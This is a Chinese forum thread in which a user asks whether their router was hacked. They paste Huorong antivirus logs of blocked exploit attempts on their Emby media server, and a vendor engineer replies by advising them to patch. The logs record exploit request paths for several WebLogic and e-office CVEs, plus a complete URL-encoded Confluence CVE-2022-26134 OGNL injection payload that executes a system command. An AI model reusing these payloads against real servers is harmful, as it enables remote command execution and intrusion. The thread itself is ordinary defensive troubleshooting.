火绒报 攻击方式：Exploit/CVE-2020-14882，是不是路由器被入侵了？

fly9902

EmbyServer.exe是电影服务器，对外网映射8096端口，为什么会出现 路由器 192.168.2.1:33234 之类的端口攻击192.168.2.2的电影服务器呢？
路由器是openwrt  192.168.2.1
电影服务器  192.168.2.2






以下是火绒日志节选




【3】2024-03-26 19:58:52,网络防护,Web服务保护,受到192.168.2.1的网络攻击，已阻止

攻击方式：Exploit/CVE-2017-10271
访问地址：180.110.115.58:8096/wls-wsat/CoordinatorPortType
远程地址：192.168.2.1:33234
本地地址：192.168.2.2:8096
防御结果：已阻止

进程ID：8932
操作进程：D:\Program Files\EmbyServer\System\EmbyServer.exe
操作进程命令行："D:\Program Files\EmbyServer\System\EmbyServer.exe"
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【4】2024-03-26 19:58:51,网络防护,Web服务保护,受到192.168.2.1的网络攻击，已阻止

攻击方式：Exploit/CVE-2017-10271
访问地址：180.110.115.58:8096/wls-wsat/CoordinatorPortType
远程地址：192.168.2.1:36834
本地地址：192.168.2.2:8096
防御结果：已阻止

进程ID：8932
操作进程：D:\Program Files\EmbyServer\System\EmbyServer.exe
操作进程命令行："D:\Program Files\EmbyServer\System\EmbyServer.exe"
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【5】2024-03-26 19:58:51,网络防护,Web服务保护,受到192.168.2.1的网络攻击，已阻止

攻击方式：Exploit/CVE-2019-2725
访问地址：180.110.115.58:8096/_async/AsyncResponseService
远程地址：192.168.2.1:36822
本地地址：192.168.2.2:8096
防御结果：已阻止

进程ID：8932
操作进程：D:\Program Files\EmbyServer\System\EmbyServer.exe
操作进程命令行："D:\Program Files\EmbyServer\System\EmbyServer.exe"
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【6】2024-03-26 19:58:51,网络防护,Web服务保护,受到192.168.2.1的网络攻击，已阻止

攻击方式：Exploit/CVE-2020-14882
访问地址：180.110.115.58:8096/console/images/%252E./console.portal
远程地址：192.168.2.1:33212
本地地址：192.168.2.2:8096
防御结果：已阻止

进程ID：8932
操作进程：D:\Program Files\EmbyServer\System\EmbyServer.exe
操作进程命令行："D:\Program Files\EmbyServer\System\EmbyServer.exe"
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【7】2024-03-26 19:58:44,网络防护,Web服务保护,受到192.168.2.1的网络攻击，已阻止

攻击方式：Exploit/CNVD-2021-49104
访问地址：180.110.115.58:8096/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
远程地址：192.168.2.1:36762
本地地址：192.168.2.2:8096
防御结果：已阻止

进程ID：8932
操作进程：D:\Program Files\EmbyServer\System\EmbyServer.exe
操作进程命令行："D:\Program Files\EmbyServer\System\EmbyServer.exe"
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【8】2024-03-26 19:58:43,网络防护,Web服务保护,受到192.168.2.1的网络攻击，已阻止

攻击方式：Exploit/CVE-2022-26134
访问地址：180.110.115.58:8096/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
远程地址：192.168.2.1:36748
本地地址：192.168.2.2:8096
防御结果：已阻止

进程ID：8932
操作进程：D:\Program Files\EmbyServer\System\EmbyServer.exe
操作进程命令行："D:\Program Files\EmbyServer\System\EmbyServer.exe"
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【9】2024-03-26 19:58:43,网络防护,Web服务保护,受到192.168.2.1的网络攻击，已阻止

攻击方式：Exploit/CVE-2022-26134
访问地址：180.110.115.58:8096/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
远程地址：192.168.2.1:36790
本地地址：192.168.2.2:8096
防御结果：已阻止

进程ID：8932
操作进程：D:\Program Files\EmbyServer\System\EmbyServer.exe
操作进程命令行："D:\Program Files\EmbyServer\System\EmbyServer.exe"
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

火绒工程师

您好，可能您环境里的网络通信触发了我们web服务保护针对这个漏洞的防护规则，所以会产生拦截日志。 您检查一下电脑中是否缺失漏洞补丁较多，这边建议您先修复大部分高危漏洞后再观察看看。